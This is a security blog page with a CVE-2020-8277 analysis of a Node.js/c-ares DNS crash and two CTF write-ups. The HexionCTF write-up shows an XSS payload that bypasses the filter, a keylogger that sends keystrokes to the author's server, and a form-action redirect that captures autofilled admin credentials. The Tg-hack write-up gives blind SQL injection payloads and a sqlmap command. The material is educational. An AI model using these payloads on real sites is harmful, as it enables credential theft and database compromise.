Wednesday, November 25, 2020

CVE-2020-8277 Analysis: From Node.JS code to OOB Reads/Fail-Check

Attack scenario

The attack scenario is quite simple. If Node.js (<15.2.1,<14.15.1,<12.19.1) invokes one of the wonderful functions in the "dns" core library with a user-controlled name.

When DNS request is invoked in Node.JS (i.e: "dns.resolve4/6/Any" are called) an attacker crafts a DNS response with several DNS records (several > 256).

Node.Js will crash upon parsing the response. 
For example, my PoC (uses "AAAA" records in the reply):

Cool exploitation scenarios

  • If the response contains "AAAA" records -> it will trigger assertion failure, before OOB read at cares_wrap.cc:1256. This is exactly what we've got at the PoC, source-code here:
  

  • If the response contains "A" records -> it will give an OOB read of the TTL records, as shown in cares_wrap.cc:756. it will then place back the resulting TTL's with that leak back to the caller function, one can observer it here:


Why it happens?

In short, the problem is actually with the c-ares library, which executes the async DNS requests and parse responses. when parsing DNS responses, some parsers compute, incorrectly, the length of the returned array of TTL values. This leads to incorrect size in the function output, i.e: the "naddrttls" value is incorrect. this will trigger the CHECK seen before. 

Intro to c-ares library

For example take the function "ares_parse_aaaa_reply". This function is responsible for parsing the AAAA replies when getting DNS response in c-ares:

This function gets char* abuffer - that contains the response to parse, alen - the response length, host - a ptr to struct to return with dns answer, addrttls / naddrttls - that contains the TTL's array (for the returned addresses, how much time till they expired) and length of this array correspondingly.

Now, note that addrttls - is actually a pointer to array that should be filled with the returned addresses TTL's.
Also note that naddrttls - is actually also a pointer that is both input and output, at start, it contains the maximal values of TTL's to return. 

So, what's the problem? what happens if the number of replies in the response is bigger than the array we can consume of addrttls. specifically: the addrttls (the TTLs array of the response packet) is bigger than the input addrttls?

Great question indeed, Regarding addrttls, it is actually truncated in some manner. "naddrttls" is being checked and our function doesn't overwrite "addrttls". So, the response is "truncated" - and only the first 256 TTL's will be considered and returned.
 
But, wait, how about naddrttls (which counts how many values was written)? 
They incorrectly count only the number of replies in the response and not the number of TTL's actually being written...  

The c-ares problem: step-by-step

1. First time counting naddrs (doesn't consider naddrttls given):


2. Writing the real TTL's back to the array (the addrttls, truncated according the naddrttls given):



3. Writing the naddrttls back - placing incorrectly just "naddrs" without checking if it's value was larger than what was really put there.



so, it means the returned naddrttls will be bigger than the real number of replies TTL's that have been written.

To fix it, they've just truncate the naddrs to the maximal size available in the response array. you can see it here in the fixed source-code:

From Node.JS code to OOB Read/Fail-Check

The flow in server side starts after getting DNS response, with one of the "Parse" functions according to the dns request made with the dns library.

For example, "dns.resolve4" in Node.js will trigger the parser function named "QueryAWrap::Parse" with the DNS-server reply. The parsing functions are in: /src/cares_wrap.cc in the node-js sources.

Some flow for example:
Parse->ParseGeneralReply->ares_parse_aaaa_reply(...).

Conclusion & Future ideas

CVE-2020-8277 poses a great threat to web-servers deployed over Node.Js with versions < 15.2.1, < 14.15.1, and < 12.19.1. It can cause an easy DOS where user deploys its own DNS servers/responding with arbitrary DNS responses. 

Also, in some rare cases, one can think about malicious ways to leak arbitrary heap data. 
That's because the TTL will be dependant on that data with respect to A records, so triggering this vuln with A records and observing the timeouts in which the server yields another DNS request might give attacker ability to predict some heaps vals / characteristics as well. cool cool :)

Tuesday, April 14, 2020

SFR || SanitizedXSS & 1PasswordManager // HexionCTF


SFR // HexionCTF
We get some webapp.


 we try to login with user=”aasd” and “password” – and we’re in! Aren’t we?
.
That’s cool, so we get to send to the admin some url and he’ll probably enters it, right?
Well… Yes, if we put our ip we get some response (opening up my own AWS instance with some small python server listener gave this result):
34.76.228.102 - - [12/Apr/2020 01:34:02] "GET / HTTP/1.1" 404 –
Sweet. What’s next?

The hint says that: 
1. The password is after login.
2. The admin have password manager installed.
Trying to login with “admin”/”admin” just for test gave us this result: “Invalid Credentials” – cool so it means we want to get it’s password right (also they say in the challenge the password waits for us there).

Vulnerabilities
1. Open-Redirection:When you login you see this:
b.       Oh, cool, so what can be next would you ask?
c.       First, any site can be here
d.       http://34.76.228.102:2003/login?next=<YOUR_IP>
                                                               i.      E.g – awesome open redirection vuln.
                                                             ii.      But, what it does with this IP?
                                                           iii.      Yes, you guessed correctly, this will be placed in the form action area.
So, the first vulnerability open-redirection looks like this code-wise:
            <form method="post" action=OUR_NEXT_GET_PARAM>
                <input name="username" id="sfrusername" type="text" placeholder="Username"/>
                <br>
                <input name="password" id="sfrpassword" type="password" placeholder="Password" />
                <br>
                <button class="good" type="submit">Login</button>
            </form>
2          2. XSS: Well, not just that of-course, as it can lead us also to xss vuln code:
At first, I was trying to place in there “/> <script>alert(1)</script>” – but got no response / response sanitize, so there is probably a sanitation, right? … well not quite exactly.
Well placing this (http://CHALL_SITE/login?next=http://www.barakolo.me%20onclick=alert``) will get us:
            <form method="post" action=http://www.barakolo.me onclick=alert``>
                <input name="username" id="sfrusername" type="text" placeholder="Username"/>
                <br>
                <input name="password" id="sfrpassword" type="password" placeholder="Password" />
                <br>
                <button class="good" type="submit">Login</button>
            </form>
This will actually add event handler that can do arbitrary Js in this site! Cool! (no csp whatsoever, nice nice nice).
This will actually pop-up a message when we click on login button – cool.
We placed `` to bypass the checks for () which aren’t allowed in this scenario.
Nice, So what now? Let’s see if we get some response admin enters this site when we will sent to him this xss.
Well, unfortunately it didn’t work, why?
Well probably mouse isn’t used there at all, so how can after all trigger js code?
Triggering JS at load:
I started to put any onX event handlers to see what gave me a response.
Keep also in mind we need to place a valid param (no () and other chars like >< are sanitized as well)
I have put this:
This WORKED! We got some response back to us, nice.
Now , finding minimal exploit that sends back info to our server, was a game of like trying this:
and also this right after
And trying this also worked so
Cool, so wait wait – then it probably means that user entering keyboard events? Does it?
All the password-manager:
In the next step according to the challenge description – the admin has password manager, oh cool cool – so the user enters its password there right? Sounds interesting.
In this stage I thought about this scenario:
If the password manager (we don’t know which password manager it is) supports auto-fill and auto-login kinda ways maybe we can trigger it – and make the user send to us user and password!! Why? Because this is exactly the form action so if we can trigger it to fill and submit we are winning, right?
Trying this:
1.       Send some js that sets autocomplete attrs to correct for username and password might also click the submit button when finish filling, right?
So this was the next thing I tried, which sets autocomplete attributes & and in the end you can see also that I added some xhr request-  why? To sniff some of the keyboard keys to get back to us probably 😊
Cool, But it didn’t worked unfortunately, the message didn’t submitted and we didn’t got any POST message in our web-server.
What’s next?
Yes you guessed that right – let’s try hook the keyboard messages to see what’s in there.

Couple of challenges here:
1.       Write arbitrary js code – many things are sanitized (“<>()” and ” is kinda part of termination for this eventhandler), request line limited by 4094 (we actually get this number as a response if we will put big enough number). So not any arbitrary code can be written this way.
2.       I found that we probably don’t really get all xhr requests we’re doing / keyboard-messages – why? Maybe because the user closes really fast it’s browser? Maybe the user have delayed connection and up/down from internet connection? We can’t really know – what we do know that according to this we kinda want our js code to sniff what it can from the password manager kinda and close fast.
3.       Some XHR requests came to my server un-ordered which made it a bit difficult to assume which letter came before the other (it can also be by the server / connection / the way maybe AWS handles new tcp connections that come to the server and many many kinda more, my focus isn’t to improve AWS so I thought to make it a little better).

Solution for arbitrary JS:
eval is ok (and also great) to do 😊 sooo – let’s utilize some cool unicode encoding:
eval(‘ANY ARBITRARY JSCODE WITH UNICODE ENCODING LIKE \uXXXX’) … but wait? Didn’t we say () isn’t allowed? Yes you’re pretty right.
But this works as well eval`document.cookie=1` - it’s actually cool thing called template literals in js.
Nice, But eventually – remember, I wanted to hook some event listener into keypress events or something like that, how?
Usually its done like this: e.addEventListener(function(e) {I am here}); - but here we CANNOT replace the () as it’s not template literal. Bummer. So what can we do?
Let’s just define it!
Function`UNICODE-ENCODING-JS-CODE` - cool! It works.
I used this method to define arbitrary js code which runs whenever user clicks our site. It looks like this:

Writing JS-Keylogger:
Let’s try to keylog anything user enters and get the password right? Well well, hell yeah 😊
I next tried to put function(e) {fetch(‘MY_SITE’ + e.keyCode)} – anf got the cool word!! “admin”!!! yes so it probably autofills stuff for an admin, right?
Let’s try to get the password – I tried to change the input form which my event listener was hooked on but to my surprise. I was getting a lot of message, weird keyboard pressed with many values – so maybe, I think, I thought it was password-manager (probably an extension?) trying to auto-fill forms and stuff to setup other data relevant to him.
When unexpcted thing occurred when I’ve observed – user had more input elements – than I did in my screen. So I tried to capture many of these but got many non-relevant probably data, for example like this:
GET /112/0 HTTP/1.1
34.76.228.102 - - [13/Apr/2020 11:31:49] code 404, message File not found
34.76.228.102 - - [13/Apr/2020 11:31:49] "GET /112/0 HTTP/1.1" 404 -
GET /67/1 HTTP/1.1
34.76.228.102 - - [13/Apr/2020 11:31:49] code 404, message File not found
34.76.228.102 - - [13/Apr/2020 11:31:49] "GET /67/1 HTTP/1.1" 404 -
GET /51/2 HTTP/1.1
….
The number after it – means the order they where captured to tryina maintain some order, unfortunately it stull seemed to be a little unordered when it reached our servers and mainly we wasn’t really sure what was the correct input form was.

Just Posting Back to-us:
Wait, but this fills a login string with open-redirection – then why not post it back to us?
What do you mean? Let’s place action=OUR_SITE, when form is submitted the current user/password filled is the correct relevant password, right? COOL!
Doing this and placing this string got me that kinda cool thing:
One of the requests where:
('POST request,\nPath: %s\nHeaders:\n%s\n\nBody:\n%s\n', '/', 'Host: 54.175.112.255\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 39\r\nConnection: keep-alive\r\nUpgrade-Insecure-Requests: 1\r\n', 'username=admin&password=j6QlMyx4lf2bSZp')
Oh yesss!!! So the password is j6QlMyx4lf2bSZp right? Well not quite yet..
Remember, we do submit in some time after we seen enough keyboard presses and just before we can do submit anymore kinda (probably because the window is gonna be closed after some time/scenario).
So, we wait for the last letter entered in some input and call submit, does it mean all the password was managed to be written? Well, unfortunately – really really not sure 😊
I tried this couple of times and put this password and it wasn’t working… but..

Famous Last words:
We probably got *almost* all the password, why? Well, remember that what we did was to wait for some keyboard messages to stop (I've counted how many messages I've seen maximal in the server side and set to submit the for when this number is reached), so maybe also the user exits sometimes *before* all the password gets written.
So, one way is to assume letter or two are missing in the end, let’s try that then, so for our game I have tried running this:
for i in string.printable:
               res = (s.post('http://34.76.228.102:2003/login',
data={'username': 'admin', 'password': 'j6QlMyx4lf2bSZp' + i}).text)
                if 'Invalid' not in res:
     print(res)

Amazing, so we finally got this as response:
hexCTF{pa55w0rd_m4nag3rs_c4n_hav3_vuln3rabilit1es_t00}

Cool, been there, done that 😊



Sunday, April 12, 2020


Bobby // Tg-hack2020 CTF:

We observe couple of things:

  1. /login - Cool login site
  2. /password - Cool password change area
  3. /style – defines website style
When one first sees the challenge name (“bobby” little tables 😉) and the site – let’s try sql-injection it’ won’t we?
After trying injecting anywhere – we finally sees some syntax sqli error when we go to /password and write new password value with incorrect things..

We can see for example, that if we place there ‘’’’ We will get:
unrecognized token: "''''''''''' WHERE user=? AND pass=?"
That’s really cool, it means couple of things:

  1. We’re probably in update / set sql command injection (it at least seems like that because we try update specific user password with these specific user/password details).
  2. There’s probably no injection in other params as they are part of prepared templated sqli syntax (“?” indicates that).
  3. Fields from some table (users tables probably or something?) is ‘user’ and ‘pass’.
Let’s first fix our query to somehow kinda validate injection.
I tried putting various comments styles / ending to remove the statement end: “--” or “#’ or “;”. But finally what seems to be working (seems to be as well kinda mysql style) was “/*”
 I tried to put this one: ‘ or ‘1’=’1’/* and got this:
sql: expected 0 arguments, got 2
Ok, this is really good because it means we kinda fixed the first syntax error we’ve made and influenced for a new one. So why we see now this error? Well, good question.
So, remember we commented out the rest of the statement, the statement is still being binded into 2 other args we give to it (remember these “?” we’ve seen before). Cool, let’s fix that:

I have put now ‘ or ?=?/* and also placed the same values for user/pass which I give as an input (so that this equality of ?=? will become true):
Password changed!
Oh yes!!! Did we made?
Well… not quite yet just a sec…

What is the username? Oops…
So I’ve tried: “admin”/”user”/”administrator”/cookie id kinda.
Ok so it’s a little harder than that.

Let’s try to explore our DB then, shall we?
Ok, let’s try get sqli version?
Putting any of: version() / @@version / version  - didn’t work unfortunately.. weird.. the server just returns back that these methods aren’t recognized.

Stack that up:

Let’s try now to stack some query and search for table names.
My next newish string was: “1' where "A"=(select "A" from TABLE_NAME) and ?=?/*” and we got:
no such table: TABLE_NAME
Cool, so it’s a good primitive to find table names (If we get password changed – then according to this table exists kinda). Let’s look for them. So let’s try some good old-fashioned information_schema.tables or even sys.tables: “”
no such table: information_schema.tables
damnnnn… so no schema… what can we do then? I’ve tried put “users” – oh well and it works 😊
Not suprising that much because – remember – we probably have it’s fields back from first stage.

La bobby table?

Ok, let’s try extract username first, change it’s password to ours and connect with the login in the previous menu, right? Right right, cool cool.


Other functions?

I’ve tried look for functions that available to me as well. No EVAL/LEFT/CHAR_LENGTH. To know which functions available we just try and see if we get some error back from them, but to inspect their usage, totally another thing.
How to inspect some functions functionallity? Remember our feedback is if we succeeded changing password or not.

So we can put something like:
a' where ‘ser’=(select SUBSTR(‘user’, 2) from users) and ?=?/*

And just wait to see if password get’s to change successfully or not.
Cool.

INSTR to the rescue:

I’ve found that instr works quite as expected. This function search specific char/string in other string and returns the index in which this string starts in another one.

Because we know already that users table is a valid one and exists we will focus on it.
Let’s try now find char by char of that username we will change the password for:
password\' where 1=(select INSTR(user, "{KNOWN_SUBSTRING} + 
NEW_BRUTEFORCE_CHAR") from users where INSTR(user, "{KNOWN_SUBSTRING}")=1 
or "{KNOWN_SUBSTRING}"="") and ?=?/*

KNOWN_SUBSTRING will be the chars we already know.
What are we doing here? Every time we try to find the next char, we call this NEW_BRUTEFORCE_CHAR.

Every time we found it is the next char in the user-name – we add it up to KNOWN_SUBSTRING.
Remember that our way to know if this is kinda valid char is that we check response for “Password changed!” string – which means sql statements was made successfully.
We also need to consider that this level restarts every 8 minutes. So we need to restart our session as well. We also need to automate this of-course and not do this by hand cause username and number of chars to validate can be also long right?

Cool. Running that and observing the result was given to us as the username:
"21db9a2aef143c4e8e3863fce29d0b35d7dbdcec18f3e8d13abdf12e78e2e3e9d713e2b4c9ab682c
6ba1a472284b37f3257a05b7ffce2542c98e4199127b0822"
Now let’s try to connect with this one and viola we got the flag mi hijo:
TG20{bobby_knows_his_sql}


Miscs:

Unicode SQLi charsets bruteforcing:

As there was the /style reference for css-style and a utf-8 support - i've thought probably in the begining that there's maybe other charsets we needed to bruteforce on. so when cool thing i kinda observed is how to generate charsets for other utf ranges. I've used data in /style area and downloaded all the .woff2 files which usually compressed with brotli. to open these i've used fonttools in python3. it worked perfectly towards generating charsets to try bruteforcing over. fortunately In the end it was kinda un-needed.

Finding SQL injections with sqlmap.py

I have also tried to automate my bf searches for the username with sqlmap.py which is a really cool tool. It can also be provided with cookie/headers and post params to try bf/inject sql statements over.
Unfortunately and probably because some tables we're kinda missing it didnt worked perfectly and need to be worked alot more probably to be perfectly working as it was probably using only specific techniques and maybe not the relevant for our cases over here.
Nonetheless, This was one of the main commands i have tried:
python sqlmap.py -u https://bobby.tghack.no/password -a --method POST -p new_pass --cookie "id=5e8ecd02xa3796b6e545debad2c51c4e13298ce70e756013a6505326ae55a364dfd38ece2ba9de568bd90a97a53805022790661fdfffd6f22bbd52aadf1b0c5965d548027x0f9090fa8d3d4547821fa5feac5d1db8f872667f68b94c6026ddb5ba9b407b88" --data "user=asdas&old_pass=asdsadasdsad&new_pass=dsadasdsa%27%28" --level 5

the -p selects the parameter that the sqlmap.py will try inject upon.
the -a tries all / verious methods. level 5 seems to be (at least by the manual) searching for more deeper ways to exploit/inject data kinda.
the --data is our form kinda data in that format.

Hitcon 2021' CTF - Vulpixelize

Vulpixelize Writeup In this challenge – we are given docker webserver with the following files: 1.       Dockerfile 2.       Simple Flask we...